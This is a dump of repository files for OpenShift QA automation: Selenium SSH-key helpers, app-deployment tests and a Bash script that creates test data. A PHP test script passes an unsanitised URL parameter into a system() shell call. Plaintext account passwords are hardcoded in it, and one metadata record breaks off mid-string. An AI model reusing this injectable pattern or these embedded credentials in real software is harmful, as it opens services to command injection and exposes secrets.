driver.find_element_by_id(\"key_submit\").click()\n    #if there is no key \n    elif (is_element_present(classself, By.ID, \"key_submit\")):\n        driver.find_element_by_id(\"key_raw_content\").clear()\n        driver.find_element_by_id(\"key_raw_content\").send_keys(key)\n        driver.find_element_by_id(\"key_submit\").click()\n        wait_element_present_by_xpath(classself, \"id('default_sshkey')/td[1]\")\n\n    wait_element_present_by_xpath(classself, \"id('%s_sshkey')/td[1]\"%name)\n    assert_element_present_by_xpath(classself, \"id('%s_sshkey')/td[1]\"%name) \n\ndef has_sshkey(classself):\n    go_to_account_page(classself)\n    if is_element_present(classself, By.ID, \"key_raw_content\"):\n        return False\n    else:\n        return True\n\ndef gen_sshkey(keyfile=None, delete=True):\n    key_filename = \"/tmp/testkey\"\n    if (keyfile!=None):\n        key_filename = keyfile \n    os.system(\"rm -f \"+key_filename+\"*; ssh-keygen -N '' -f \"+key_filename+\" 1>/dev/null\")\n\n    fpub = open(key_filename+\".pub\", \"r\")\n    public = fpub.read()\n    fpub.close()\n\n    fpriv = open(key_filename, \"r\")\n    private = fpriv.read()\n    fpriv.close()\n    if delete:\n        os.system(\"rm -f %s*\"%key_filename)\n    return (private, public)\n\ndef delete_sshkey(classself, keyname):\n    driver = classself.driver\n    go_to_account_page(classself)\n    driver.find_element_by_xpath(\"id('%s_sshkey')/td[3]\"%keyname).click()\n    wait_element_present_by_xpath(classself, \"id('%s_sshkey')/td[3]\"%keyname)\n    assert_element_present_by_xpath(classself, \"id('%s_sshkey')/td[3]\"%keyname)\n" }, { "alpha_fraction": 0.5812231302261353, "alphanum_fraction": 0.5883898735046387, "avg_line_length": 35.71052551269531, "blob_id": "4f55132ad983a0b4014329037fb00564b09dc568", "content_id": "84147456d506a92f4e8...wait
"fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: jboss_mongodb_driver.py\n# Date: 2012/02/28 06:00\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase, common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1613][Runtime]Add Mongo DB driver module\"\n self.app_name = 'jboss1'\n self.app_type = 'jbossas'\n tcms_testcase_id = 135841\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\n\nclass JbossMongodbDriver(OpenShiftTest):\n\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\"Create a JBoss app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"Embed mongoDB\",\n common.embed,\n function_parameters = [self.app_name, 'add-%s'%common.cartridge_types['mongodb'],self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0,\n expect_description=0))\n\n def git_pull_n_update(app_name):\n mongo = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mongodb']]\n cmd='''\n cd %s &&\n git remote add upstream -m master git://github.com/openshift/jbossas-mongoDB-quickstart.git &&\n git pull -s recursive -X theirs upstream master &&\n git rm -r .openshift/config/modules &&\n export WEBXML='src/main/webapp/WEB-INF/web.xml' &&\n sed -i '/<param-name>host/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>port/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>db/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>user/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' src/main/webapp/WEB-INF/web.xml &&\n sed -i '/<param-name>password/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' src/main/webapp/WEB-INF/web.xml &&\n git commit -a -m \"Removed modules and updated web.xml for mongoDB\" &&\n git push\n '''%(self.app_name, mongo['url'], mongo['port'], mongo['database'], mongo['username'], mongo['password'])\n\n (status, output) = common.command_getstatusoutput(cmd)\n\n return status\n\n self.steps.append(testcase.TestCaseStep(\"Pull the remote source...\",\n git_pull_n_update,\n function_parameters = [self.app_name],\n expect_return=0))\n\n def verify(app_name):\n app_url = OSConf.get_app_url(app_name)\n r = common.grep_web_page('%s/mongoDB'%app_url, 'Tutorial Objects Added to DB')\n r += common.grep_web_page('%s/mongoDB'%app_url, 'testCollection')\n return r\n\n self.steps.append(testcase.TestCaseStep(\"Check the web application\",\n verify,\n function_parameters = [self.app_name],\n expect_return=0))\n\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossMongodbDriver)\n return suite\n\ndef 
run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of jboss_mongodb_driver.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5437276363372803, "alphanum_fraction": 0.5536956787109375, "avg_line_length": 28.69832420349121, "blob_id": "563146cb78c996d178ba1952fcbb43b027d98e5c", "content_id": "ff3edf807c88e2d1c47d9e47b8ba58fc14a7cf7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5317, "license_type": "no_license", "max_line_length": 97, "num_lines": 179, "path": "/automation/open/testmodules/RT/node/bandwith_for_spammers.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: bandwith_for_spammers.py\n# Date: 2012/02/27 03:59\n# Author: [email protected]\n#\n\nimport common\nimport Common.File\nimport OSConf\nimport rhtest\nimport time\nimport json\n\nclass OpenShiftTest(rhtest.Test):\n ACCOUNT = {\n 'SMTP' : 'smtp.googlemail.com',\n 'USERNAME' : '[email protected]',\n 'PASSWORD' : 'vostok08'}\n ports = { #limits per port\n '25': {'limit_kbps': 24, \n 'fsize_kb':32 \n },\n '587':{'limit_kbps': 256,\n 'fsize_kb':128\n }}\n def initialize(self):\n self.ACCOUNT['RECIPIENT'] = self.config.OPENSHIFT_user_email\n self.summary = \"[Runtime][rhc-cartridge][US1478] Bandwith restriction for spamming users\"\n self.app_name = 'spam'+common.getRandomString(7)\n self.app_type = 'php'\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass BandwidthForSpammers(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a PHP app\" , \n common.create_app,\n function_parameters=[ self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0)\n\n self.add_step(\"Enable email functionality.\",\n self.write_file, \n expect_return=0)\n\n self.add_step(\"Verify the limits via remote script.\",\n self.verify,\n expect_return=True)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def verify(self):\n base_url = OSConf.get_app_url(self.app_name)\n opts=\"-s -H Pragma:no-cache\"\n time.sleep(5)\n for port in self.ports.keys():\n time.sleep(10)\n url = base_url +'/spammer.php?port=%s&size=%s'%(port, self.ports[port]['fsize_kb'])\n fetch_cmd = \"curl %s '%s'\"%(opts, url)\n (retcode, output) = common.command_getstatusoutput(fetch_cmd)\n try:\n res = json.loads(output)\n except Exception as e:\n self.error(\"%s -- %s\"%(e, output))\n return False\n self.debug(res)\n if res['transmission_rate_kbps'] > self.ports[port]['limit_kbps']:\n self.error(\"Transmission rate for port#%s was over the allowed limit.\"%port)\n return False\n return True\n\n def write_file(self):\n php_program='''\n<?php\n\n// PEAR\nrequire_once('Mail.php');\nrequire_once('Mail/mime.php');\n\n// Sending Mail\nfunction mail_sending($hostname, $port, $username, $password, $attachment ) {\n $extraheaders['From'] = '%(USERNAME)s';\n $extraheaders['To'] = '%(RECIPIENT)s';\n $extraheaders['Subject'] = 'Test message';\n\n $params['host'] = $hostname;\n $params['port'] = $port;\n $params['auth'] = true;\n $params['username'] = $username;\n $params['password'] = $password;\n //Enable this if you want to debug ERRORS!\n //Then don't expect to have valid JSON response.\n //$params['debug'] = true;\n\n $smtp = Mail::factory('smtp', $params);\n\n $message = new Mail_mime();\n $message->setTXTBody('Just testing...');\n $message->addAttachment($attachment);\n $body = $message->get();\n $headers = 
$message->headers($extraheaders);\n\n $start_time = time(); \n $status = $smtp->send($extraheaders['To'], $headers, $body); \n $end_time = time();\n\n if (PEAR::isError($status)) {\n $error = $smtp->getMessage();\n }else{\n $error = \"Message successfully sent!\";\n }\n\n $diff = $end_time - $start_time;\n $size = strlen($body);\n $speed = ( ( (float) $size * 8 ) / $diff ) / 1024;\n return array(\n \"port\" => $port,\n \"error\" => $error,\n \"body_length\" => $size,\n \"filename\" => $attachment,\n \"elapsed_in_seconds\" => $diff,\n \"transmission_rate_kbps\" => $speed\n );\n}\n\n// Configuration\n$USERNAME = '%(USERNAME)s';\n$PASSWORD = '%(PASSWORD)s';\n\n// Creating testing attachments\nif (isset($_GET['size'])){\n $size=$_GET['size'];\n}else{\n $size=32;\n}\n$test_file = \"/tmp/test.img\";\nsystem(\"dd if=/dev/urandom of=$test_file bs=1024 count=$size\");\n\nif (isset($_GET['port'])){\n $port = $_GET['port'];\n}else{\n $port = 25;\n}\n$smtp_server='%(SMTP)s';\n$res = mail_sending($smtp_server, $port, $USERNAME, $PASSWORD, $test_file);\nprint json_encode($res);\n\n?>'''%(self.ACCOUNT)\n Common.File.append('%s/deplist.txt'%self.app_name, \"Mail\")\n Common.File.append('%s/deplist.txt'%self.app_name, \"Mail_Mime\")\n Common.File.write('%s/php/spammer.php'%self.app_name, php_program)\n cmd = [ 'cd %s '%self.app_name,\n 'git add php/spammer.php',\n 'git commit -a -m \"Added email feature\"',\n 'git push']\n return common.command_getstatusoutput(\" && \".join(cmd))[0]\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BandwidthForSpammers)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of bandwith_for_spammers.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5596213340759277, "alphanum_fraction": 0.5707870721817017, "avg_line_length": 46.6242790222168, "blob_id": "0457743bbabed4e923fa39b5edc20937f8fe4ed0", "content_id": "0c80d4c3f1ce4e4793a6746e0d1bae82ada0dd2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16479, "license_type": "no_license", "max_line_length": 550, "num_lines": 346, "path": "/automation/open/prepare_testing_data/create_test_data.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrun_command() {\n local command=\"$1\"\n echo \"Command: ${command}\" 2>&1 | tee -a ${log_file}\n #Method 1\n #output=$(eval \"${command}\" 2>&1)\n #ret=$?\n #echo -e \"$output\\n\" | tee -a ${log_file}\n\n #Method 2\n #(eval \"${command}\"; echo \"ret=$?\" >/tmp/ret) 2>&1 | tee -a ${log_file}\n #source /tmp/ret\n #rm -rf /tmp/ret\n #echo \"\"\n\n #Method 3\n eval \"${command}\" 2>&1 | tee -a ${log_file}\n ret=${PIPESTATUS[0]}\n return $ret\n}\n\nfunction create_app() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Creating ${cart_name} app - ${app_name} ...\"\n command=\"rm -rf ${app_name} && rhc app create ${app_name} ${cart_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return $?\n}\n\nfunction add_cart() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Embedding ${cart_name} to ${app_name} app ...\"\n command=\"rhc cartridge add ${cart_name} -a ${app_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return 
$?\n}\n\nfunction remove_cart() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Removing ${cart_name} from ${app_name} app ...\"\n command=\"rhc cartridge remove ${cart_name} ${app_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return $?\n}\n\nfunction destroy_app() {\n local app_name=\"$1\"\n local rhlogin=\"$2\"\n local passwd=\"$3\"\n local options=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Destroying ${app_name} app ...\"\n command=\"rhc app delete ${app_name} --confirm -l ${rhlogin} -p ${passwd}\"\n run_command \"${command}\"\n return $?\n}\n\nget_date() {\n local date=$(date +\"%Y-%m-%d-%H-%M-%S\")\n echo \"$date\"\n}\n\nget_db_host() {\n local output=\"$1\"\n echo \"${output}\" | grep '^ *Connection URL:' | grep -v 'MySQL gear-local' | awk -F'/' '{print $3}' | awk -F: '{print $1}'\n return $?\n}\n\nget_db_port() {\n local output=\"$1\"\n echo \"${output}\" | grep '^ *Connection URL:' | grep -v 'MySQL gear-local' | awk -F'/' '{print $3}' | awk -F: '{print $2}'\n return $?\n}\n\nget_db_passwd() {\n local output=\"$1\"\n echo \"${output}\" | grep 'Root Password:' | awk '{print $NF}'\n return $?\n}\n\n########################################\n### Main ###\n########################################\n\nrhlogin=\"xx\"\nnamespace=\"xx\"\npassword=\"redhat\"\n\n#jbossas_app=\"jbossastest\"\npython_app=\"reviewboard\"\nphp_app=\"drupal\"\nperl_app=\"perlapp\"\nruby18_app=\"redmine\"\ndiy_app=\"diytest\"\njbosseap_app=\"jbeapapp\"\nruby19_app=\"railsapp\"\njbossews_app=\"jbewsapp\"\n#nodejs_app=\"etherpad\"\n\nscalable_python_app=\"pythonscal\"\nscalable_php_app=\"mediawiki\"\nscalable_perl_app=\"perlscal\"\nscalable_ruby18_app=\"ruby18scal\"\nscalable_jbosseap_app=\"jbeapscal\"\nscalable_ruby19_app=\"ruby19scal\"\nscalable_jbossews_app=\"jbewsscal\"\n\n\n#scalable_nodejs_app=\"nodejsscal\"\n\n# initial log\ndate=$(get_date)\nlog_file=\"log/my.${date}.log\"\nuser_info_file=\"user_info.${date}\"\n\nif [ ! -d log ]; then\n mkdir log\nfi\n\ntouch ${log_file}\n\n#set -x\n\n# create domains and keys\n#echo -e \"Create domains and keys ...\\n\"\n#command=\"rhc-create-domain -n ${namespace1} -l ${rhlogin} -p ${password}\"\n#run_command \"${command}\"\n#ret1=$?\n#command=\"rhc-create-domain -n ${namespace2} -l ${rhlogin} -p ${password}\"\n#run_command \"${command}\"\n#ret2=$?\n#if [ X\"$ret1\" != X\"0\" ] || [ X\"$ret2\" != X\"0\" ]; then \n# echo \"Please destroy already existing domains or using non-exisiting domains\"\n# exit 1\n#fi\n\n#key_name=\"mykey\"\n#dsa_key_file=\"~/.ssh/mykey\"\n#if [ ! -f ${dsa_key_file} ]; then\n# echo -e \"Generating ssh-dsa key\\n\"\n# command=\"ssh-keygen -N '' -y -t dsa -f ${dsa_key_file}\"\n# run_command \"${command}\"\n#fi\n#command=\"rhc-ctl-domain -n ${namespace1} -l ${rhlogin} -a ${key_name} -k ${dsa_key_file}.pub -p ${password}\"\n#run_command \"${command}\"\n\necho -e \"Please input your choice\\n 0: all data \\n Specified app: jbossas_app|python_app|perl_app|ruby18_app|diy_app|php_app|nodejs_app|ruby19_app|jbossews_app|jbosseap_app|scalable_jbosseap_app|scalable_perl_app|scalable_ruby18_app|scalable_php_app|scalable_python_app|scalable_ruby19_app|scalable_nodejs_app|scalable_jbossews_app\"\nread choice\n# create app and embedding cartridge\n\necho -e \"Creating test data ... 
\\n\"\necho '---------------------------------' | tee -a ${log_file}\ncreate_app jenkins \"jenkins\" ${rhlogin} ${password}\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbossas_app\" ]; then\n# create_app ${jbossas_app} \"jbossas-7\" ${rhlogin} ${password} '--enable-jenkins' \"-g medium\" &&\n# add_cart ${jbossas_app} \"postgresql-8.4\" ${rhlogin} ${password} &&\n# run_command \"cp -rf data/test.jsp ${jbossas_app}/src/main/webapp/ && cd ${jbossas_app} && git add . && git commit -a -mx && git push && cd -\"\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"python_app\" ]; then\n create_app ${python_app} \"python\" ${rhlogin} ${password} &&\n add_cart ${python_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n add_cart ${python_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${python_app} \"phpmyadmin-3.4\" ${rhlogin} ${password} &&\n run_command \"cd ${python_app} && git remote add upstream -m master git://github.com/openshift/reviewboard-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"perl_app\" ]; then \n create_app ${perl_app} \"perl-5.10\" ${rhlogin} ${password} &&\n output=$(add_cart ${perl_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/test.pl ${perl_app}/perl/ && cd ${perl_app} && sed -i -e 's/changeme_db/${perl_app}/g' -e 's/changeme_url/${db_host}/g' -e 's/changeme_port/${db_port}/g' -e 's/changeme_username/admin/g' -e 's/changeme_password/${db_passwd}/g' perl/test.pl && git add . 
&& git commit -a -mx && git push && cd -\"\n run_command \"rhc app stop ${perl_app} -l ${rhlogin} -p ${password}\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"ruby18_app\" ]; then \n create_app ${ruby18_app} \"ruby-1.8\" ${rhlogin} ${password} &&\n output=$(add_cart ${ruby18_app} \"mysql-5.1\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n run_command \"rhc alias add ${ruby18_app} -l ${rhlogin} -p ${password} bar.${namespace}.com\" &&\n #add_cart ${ruby18_app} \"metrics-0.1\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${ruby18_app} && rm -rf * && git remote add upstream -m master git://github.com/openshift/redmine-openshift-quickstart.git && git pull -s recursive -X theirs upstream master && sed -i -e 's/password:.*/password: ${db_passwd}/' -e 's/host:.*/host: ${db_host}/' config/database.yml && git commit -a -m 'DB Changes' && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"diy_app\" ]; then\n create_app ${diy_app} \"diy-0.1\" ${rhlogin} ${password} &&\n run_command \"cd data && tar -xvzf django-1.3.1.tar.gz && cd - && mv data/Django-1.3.1/django ${diy_app}/diy/ && cd ${diy_app}/diy/ && unzip ../../data/myrawapp.zip && cd -\" &&\n run_command \"cp data/diyapp_start ${diy_app}/.openshift/action_hooks/start && cp data/diyapp_stop ${diy_app}/.openshift/action_hooks/stop\" &&\n run_command \"cd ${diy_app} && git add . && git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"php_app\" ]; then\n create_app ${php_app} \"php\" ${rhlogin} ${password} &&\n add_cart ${php_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n add_cart ${php_app} \"cron\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${php_app} \"phpmyadmin-3.4\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${php_app} && git remote add upstream -m master git://github.com/openshift/drupal-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"nodejs_app\" ]; then\n# create_app ${nodejs_app} \"nodejs-0.6\" ${rhlogin} ${password} &&\n# add_cart ${nodejs_app} \"mongodb-2.2\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${nodejs_app} \"rockmongo-1.1\" \"${rhlogin}\" \"${password}\" &&\n# run_command \"mkdir ${nodejs_app}/.openshift/mms && cp ~/Downloads/mms-agent/settings.py ${nodejs_app}/.openshift/mms/settings.py && cd ${nodejs_app} && git add . 
&& git commit -a -mx && git push && cd -\" &&\n# add_cart ${nodejs_app} \"10gen-mms-agent-0.1\" \"${rhlogin}\" \"${password}\" &&\n# run_command \"cd ${nodejs_app} && git remote add upstream -m master git://github.com/openshift/etherpad-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"ruby19_app\" ]; then\n create_app ${ruby19_app} \"ruby-1.9\" ${rhlogin} ${password} &&\n add_cart ${ruby19_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${ruby19_app} && git remote add upstream -m master git://github.com/openshift/rails-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbossews_app\" ]; then\n create_app ${jbossews_app} \"jbossews\" ${rhlogin} ${password} \"-g medium\" &&\n output=$(add_cart ${jbossews_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/mysql.jsp ${jbossews_app}/src/main/webapp/ && mkdir -p ${jbossews_app}/src/main/webapp/WEB-INF/lib && cp -rf data/mysql-connector-java-5.1.20-bin.jar ${jbossews_app}/src/main/webapp/WEB-INF/lib && cd ${jbossews_app}/src/main/webapp/ && sed -i -e 's/#host/${db_host}/g' mysql.jsp && sed -i -e 's/#port/${db_port}/g' mysql.jsp && sed -i -e 's/#dbname/${jbossews_app}/g' mysql.jsp && sed -i -e 's/#user/admin/g' mysql.jsp && sed -i -e 's/#passwd/${db_passwd}/g' mysql.jsp && git add . && git commit -amt && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbosseap_app\" ]; then\n create_app ${jbosseap_app} \"jbosseap\" ${rhlogin} ${password} \"-g medium\" &&\n add_cart ${jbosseap_app} \"postgresql-8.4\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cp -rf data/test.jsp ${jbosseap_app}/src/main/webapp/test.jsp && cd ${jbosseap_app} && git add . && git commit -a -mx && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_jbosseap_app\" ]; then\n create_app ${scalable_jbosseap_app} \"jbosseap-6.0\" ${rhlogin} ${password} '--scaling' \"-g medium\" &&\n add_cart ${scalable_jbosseap_app} \"jenkins-client\" ${rhlogin} ${password} &&\n add_cart ${scalable_jbosseap_app} \"mysql\" ${rhlogin} ${password} &&\n run_command \"cp -rf data/test1.jsp ${scalable_jbosseap_app}/src/main/webapp/test.jsp && cd ${scalable_jbosseap_app} && git add . 
&& git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_perl_app\" ]; then\n create_app ${scalable_perl_app} \"perl-5.10\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_perl_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n output=$(add_cart ${scalable_perl_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/test.pl ${scalable_perl_app}/perl/ && cd ${scalable_perl_app} && sed -i -e 's/changeme_db/${scalable_perl_app}/g' -e 's/changeme_url/${db_host}/g' -e 's/changeme_port/${db_port}/g' -e 's/changeme_username/admin/g' -e 's/changeme_password/${db_passwd}/g' perl/test.pl && git add . && git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_ruby18_app\" ]; then\n create_app ${scalable_ruby18_app} \"ruby-1.8\" ${rhlogin} ${password} '--scaling' &&\n output=$(add_cart ${scalable_ruby18_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -r data/{config.ru,Gemfile} ${scalable_ruby18_app}/ && cd ${scalable_ruby18_app} && bundle install && sed -i -e 's/#host/${db_host}/g' config.ru && sed -i -e 's/#port/${db_port}/g' config.ru && sed -i -e 's/#dbname/${scalable_ruby18_app}/g' config.ru && sed -i -e 's/#user/admin/g' config.ru && sed -i -e 's/#passwd/${db_passwd}/g' config.ru && git add . && git commit -amt && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_php_app\" ]; then\n create_app ${scalable_php_app} \"php\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_php_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_php_app} && git remote add upstream -m master git://github.com/openshift/mediawiki-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_python_app\" ]; then\n create_app ${scalable_python_app} \"python\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_python_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n output=$(add_cart ${scalable_python_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -r data/application ${scalable_python_app}/wsgi/ && cd ${scalable_python_app} && sed -i -e 's/#host/${db_host}/g' -e 's/#port/${db_port}/g' -e 's/#dbname/${scalable_python_app}/g' -e 's/#user/admin/g' -e 's/#passwd/${db_passwd}/g' wsgi/application && git add . 
&& git commit -amt && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_ruby19_app\" ]; then\n create_app ${scalable_ruby19_app} \"ruby-1.9\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_ruby19_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_ruby19_app} && git remote add upstream -m master git://github.com/openshift/rails-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_nodejs_app\" ]; then\n# create_app ${scalable_nodejs_app} \"nodejs-0.6\" ${rhlogin} ${password} '--scaling'\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_jbossews_app\" ]; then\n create_app ${scalable_jbossews_app} \"jbossews\" ${rhlogin} ${password} '--scaling' \"-g medium\" &&\n add_cart ${scalable_jbossews_app} \"postgresql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_jbossews_app} && git remote add upstream -m master git://github.com/openshift/tomcat6-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\n# Save user info into file\necho \"Saving user info for ${namespace}\"\nrhc domain show -l ${rhlogin} -p ${password} | tee ${user_info_file}.${namespace}\n\n" }, { "alpha_fraction": 0.5985348224639893, "alphanum_fraction": 0.6234432458877563, "avg_line_length": 21.733333587646484, "blob_id": "3517dfeea035775c3c39009eb44f882bf6534b80", "content_id": "505c92d9c787063879a05b2d820d3740e96fa5f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1365, "license_type": "no_license", "max_line_length": 105, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/case_122419.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122419.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_existing_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create domain with existing domain\n 